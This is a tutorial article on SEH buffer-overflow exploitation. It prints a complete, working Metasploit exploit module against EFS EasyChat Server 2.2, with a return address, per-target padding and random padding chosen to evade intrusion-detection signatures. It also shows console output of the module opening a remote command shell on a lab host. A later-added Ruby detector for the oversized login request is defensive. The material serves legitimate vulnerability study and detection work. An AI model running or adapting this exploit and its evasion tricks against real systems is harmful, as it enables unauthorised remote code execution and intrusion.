Understanding SEH (Structured Exception Handler) Exploitation
Written by Donny Hubener
Friday, 03 July 2009
Building a Metasploit Exploit Module

While we could maintain a separate script for each flavor of Windows, it makes more sense to write an exploit module for a tool that is already designed to provide this kind of flexibility. We have already discussed how the Metasploit project provides shellcode and an opcode database; it also provides a free framework for developing and executing exploit code against a remote target as a means to study security vulnerabilities, facilitate application penetration testing, and aid in IDS (Intrusion Detection System) signature development.

The wonderful aspect of using something like Metasploit is that we can concentrate solely on the exploit design and not worry about the payload itself. In our script, we used a payload that popped up the Windows calc.exe to prove the exploit worked. With Metasploit we can take advantage of already built payloads to perform more advanced tasks. For example, the windows/shell/reverse_tcp payload opens a command prompt on the target host that connects back to the attacker host, and it can be swapped for windows/vncinject/bind_tcp, which provides a GUI session on the target host instead. You can see how proof of concept exploit code that merely launches calc.exe can quickly be transformed into a fully functional, powerful exploit.

Due to some limitations of the Windows version of Metasploit, I chose to implement the exploit module using Framework 3.2 on Ubuntu 8.04 LTS Desktop. A fair amount of preparation is needed on Ubuntu before Metasploit will function correctly. I used the two links below to assist in this initial setup:

http://trac.metasploit.com/wiki/Metasploit3/InstallUbuntu

https://help.ubuntu.com/community/RubyOnRails


The Metasploit team did a great job of documenting how to use the framework with the existing exploits and payloads in the user guide. There is also a development guide which, at a high level, covers how to write a custom exploit module, among other things. Unfortunately, the development guide does not go into much detail on the specific components of an exploit module, such as the options available for the various fields and what each field is used for. At the time of this writing, the Metasploit team is supposedly working on a book which will hopefully include this detailed information. We should appreciate all the hard work the team has put into providing this free tool and the documentation that we have thus far. However, until the detailed information is formally documented, we will need to rely on existing exploits and what little information is publicly available to write our custom exploit module.

Since we know that this exploit makes an HTTP connection and targets a Windows host, we can begin by looking at the other exploit modules located in the following directory:

framework-3.2/modules/exploits/windows/http

There are several working exploits in that directory which we can use as models for our own module. Let's create a new file in this directory and call it efs_easychat.rb. This will be the new Ruby exploit module. Below is the completed module that we will write. We will talk about each section of the module in some detail, but we will not go into the Ruby syntax in this paper since that is readily accessible in books and online. Since the detailed Metasploit documentation is not available, the information provided here is partly speculative and should not be taken as complete fact.

##
# $Id$
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # remote exploit with the HTTP client and SEH helper methods mixed in
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EFS EasyChat Server Authentication SEH Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in EFS EasyChat Server 2.2.
        By sending an overly long authentication request, an attacker may
        execute arbitrary code.
      },
      'Author'         => [ 'Donny Hubener' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 1 $',
      'References'     =>
        [
          [ 'BID', '33976' ],
          [ 'CVE', '2004-2466' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          # maximum shellcode size and the bytes the encoder must avoid
          'Space'           => 800,
          'BadChars'        => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # the same pop/pop/ret address works on all three service packs;
          # only the padding in front of the SEH record differs (see exploit)
          [ 'EasyChat Server 2.2 on WinXPSP1 English',
            {
              'Ret' => 0x1001b1db # universal pop/pop/ret
            }
          ],
          [ 'EasyChat Server 2.2 on WinXPSP2 English',
            {
              'Ret' => 0x1001b1db # universal pop/pop/ret
            }
          ],
          [ 'EasyChat Server 2.2 on WinXPSP3 English',
            {
              'Ret' => 0x1001b1db # universal pop/pop/ret
            }
          ],
        ],
      'DisclosureDate' => 'Aug 14 2007',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(80) ], self.class)
  end

  # look for the EasyChat banner in the Server header of a plain request
  def check
    res = send_request_raw
    if res and res['Server'] =~ /Easy Chat Server\/1.0/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    # check target to adjust initial buffer padding
    if target.name == 'EasyChat Server 2.2 on WinXPSP1 English'
      bufpad = 216
    elsif target.name == 'EasyChat Server 2.2 on WinXPSP2 English'
      bufpad = 218
    elsif target.name == 'EasyChat Server 2.2 on WinXPSP3 English'
      bufpad = 216
    else
      bufpad = 216
    end

    # create initial buffer pad with random alpha text
    initbuf = rand_text_alpha(bufpad)

    # create SEH payload (short jump, pop/pop/ret address, shellcode)
    seh = generate_seh_payload(target.ret)

    # create buffer to be used as the username field
    bigbuf = initbuf + seh

    # create password with random alpha text
    randpass = rand_text_alpha(rand(20) + 1)

    # create complete uri string to send
    uri = "/chat.ghp?username=#{bigbuf}&password=#{randpass}&room=1&sex=2"

    print_status("Trying target #{target.name}...")
    send_request_raw({ 'uri' => uri }, 5)

    handler
    disconnect
  end

end

The first few lines of code tell the framework that this is a remote exploit that uses the SEH and HttpClient supporting methods. Most of the fields under the initialize section are fairly self explanatory, such as Name, Description, Author, etc. Under Payload, however, we set the maximum size of the payload with the Space field. In our case we have set this to 800 bytes, but it can be adjusted to a different value. Additionally, there is a BadChars field which lists several bytes (in hexadecimal) that must not appear anywhere in the buffer. Notice the first one is 00, which we learned earlier had to be removed because it represents the null terminator of a string. Most of the others are bytes with a special meaning in a URL or HTTP request line (for example space, CR, LF, &, ? and %), so their presence would truncate or alter the request before it reached the vulnerable code, which is why they too must be avoided.

While still under the initialize section, we also define our targets. We have defined three targets: the English versions of Windows XP SP1, SP2, and SP3. The Ret field of each of these is assigned the universal pop/pop/ret address we found in the EasyChat module. If we did not have a universal address, we could specify a different address for each target, provided that address is valid in that version of Windows.

The next major section is the check method. This is code that attempts to determine whether the target is actually vulnerable. In our case, we perform a raw HTTP request and inspect the response. EasyChat was nice enough to populate the Server header in the response with "Easy Chat Server/1.0", which we can use to at least indicate that EasyChat is present. Since the installed version is actually 2.2, the banner does not tell us for sure that our exploit will function properly, but it does indicate that some version of EasyChat is running and may be vulnerable.

The final major section, the exploit method, is what actually runs the attack. Since we know we need to adjust the initial padding depending on the Windows service pack, we write a simple if/else sequence to check which target name was selected and adjust accordingly. We then create the initial buffer from random alpha text, which makes it much more difficult for an IDS/IPS device to build a signature that could detect our exploit attempt. Next we create the SEH payload with the Metasploit function generate_seh_payload. This handy function understands how SEH exploits work and builds a buffer containing the short jump opcode, the pop/pop/ret address, and the stage 2 payload shellcode. All that is left is to combine the initial buffer of random alpha text with the result of this function, and we have the complete buffer that we use for the username.

Before sending the exploit URI, we also create a random password of alpha characters, up to a maximum of 20 characters. Again, this is an attempt to make it harder to construct an IDS/IPS signature. Once this is complete, we send the raw request and exit gracefully.
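The random alpha padding and password described above defeat signatures that look for fixed byte patterns, but they do not change the shape of the request. The following Ruby detector is an added example (not from the original paper or from Metasploit) that flags chat.ghp logins by the length of the username field and by the presence of non-printable bytes, which the SEH record and raw payload always contain; the 64-byte threshold, the sample request lines and the names MAX_USERNAME_LEN, chat_params, suspicious? and flagged_requests are assumptions.

```ruby
# Added example (not part of the original article or of Metasploit): a structural
# detector for the oversized chat.ghp authentication request built by the module.
# It ignores the byte values of the padding, which the exploit randomises, and keys
# on the field length and on bytes that no real login ever contains.

MAX_USERNAME_LEN = 64   # assumed limit for a legitimate username; tune per deployment

SEH_RECORD = [0x1001b1db].pack('V')  # the module's Ret value, little-endian
STAGE_STUB = "\x90".b * 16           # constructed stand-in for raw payload bytes (not shellcode)

# Constructed sample request lines: two ordinary logins and one overflow attempt
# shaped like the module's output (218 bytes of padding for the SP2 target).
SAMPLE_REQUESTS = [
  "GET /chat.ghp?username=alice&password=secret&room=1&sex=2 HTTP/1.1",
  "GET /chat.ghp?username=bob&password=hunter2&room=1&sex=1 HTTP/1.1",
  "GET /chat.ghp?username=".b + "A".b * 218 + SEH_RECORD + STAGE_STUB +
    "&password=xyzzy&room=1&sex=2 HTTP/1.1".b,
]

# Parse the query string of a chat.ghp request line into a hash of raw values.
# Work on a binary copy so that non-UTF-8 payload bytes do not break the regex.
# Returns nil for any other request.
def chat_params(line)
  m = line.b.match(%r{\A\S+\s+/chat\.ghp\?(\S*)})
  return nil unless m
  m[1].split('&').each_with_object({}) do |pair, h|
    k, v = pair.split('=', 2)
    h[k] = v.to_s
  end
end

# A login is suspicious when the username is longer than any real name or carries
# bytes outside printable ASCII; the pop/pop/ret address and the raw payload are
# never printable even when the padding is random letters.
def suspicious?(line)
  params = chat_params(line)
  return false unless params
  user = params['username'].to_s
  user.bytesize > MAX_USERNAME_LEN || user.bytes.any? { |b| b < 0x20 || b > 0x7e }
end

# Indices of the request lines that should be alerted on.
def flagged_requests(lines)
  lines.each_index.select { |i| suspicious?(lines[i]) }
end

if __FILE__ == $0
  flagged_requests(SAMPLE_REQUESTS).each do |i|
    puts "request #{i}: username field is #{chat_params(SAMPLE_REQUESTS[i])['username'].bytesize} bytes"
  end
end
```

Note that every whitespace byte that would break this parse (0x20, 0x0a, 0x0d, 0x0b) is also in the module's BadChars list, so the request line of a working exploit is always one unbroken token.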


Running the Metasploit Exploit Module

As stated previously, there is good documentation on their site on how to run an exploit using Metasploit. The following output shows the exploit we just created in use.

tester@tester-desktop:~/metasploit/framework-3.2$ ./msfconsole

=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux

msf > use windows/http/efs_easychat
msf exploit(efs_easychat) > set RHOST 10.10.10.193
RHOST => 10.10.10.193
msf exploit(efs_easychat) > show targets

Exploit targets:

Id Name
-- ----
0 EasyChat Server 2.2 on WinXPSP1 English
1 EasyChat Server 2.2 on WinXPSP2 English
2 EasyChat Server 2.2 on WinXPSP3 English

msf exploit(efs_easychat) > set TARGET 1
TARGET => 1
msf exploit(efs_easychat) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(efs_easychat) > set LHOST 10.10.10.206
LHOST => 10.10.10.206
msf exploit(efs_easychat) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 10.10.10.193 yes The target address
RPORT 80 yes The target port
SSL false no Use SSL
VHOST no HTTP server virtual host

Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 10.10.10.193 no The target address

Exploit target:

Id Name
-- ----
1 EasyChat Server 2.2 on WinXPSP2 English

msf exploit(efs_easychat) > check
[*] The target appears to be vulnerable.
msf exploit(efs_easychat) > exploit

[*] Trying target EasyChat Server 2.2 on WinXPSP2 English...
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.10.206:45076 -> 10.10.10.193:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Tester\Desktop>cd \data
cd \data

C:\Data>dir
dir
Volume in drive C has no label.
Volume Serial Number is 70C8-E884

Directory of C:\Data

07/01/2009 10:31 AM <DIR> .
07/01/2009 10:31 AM <DIR> ..
06/25/2009 12:48 PM <DIR> Apps
07/01/2009 10:31 AM 33 target_sp2.txt
06/09/2009 07:48 PM <DIR> Temp
1 File(s) 33 bytes
4 Dir(s) 3,782,705,152 bytes free

C:\Data>

We can see that the exploit worked successfully.

Conclusion

The goal of this paper was to provide an understanding of how the Windows Structured Exception Handler behaves and how it can be exploited. Combining the theory with a walk-through of a real world exploit helps to solidify the concepts. Using Metasploit as an exploit design tool illustrates how quickly a proof of concept exploit can be transformed into a powerful attack mechanism.



Last Updated ( Tuesday, 07 July 2009 )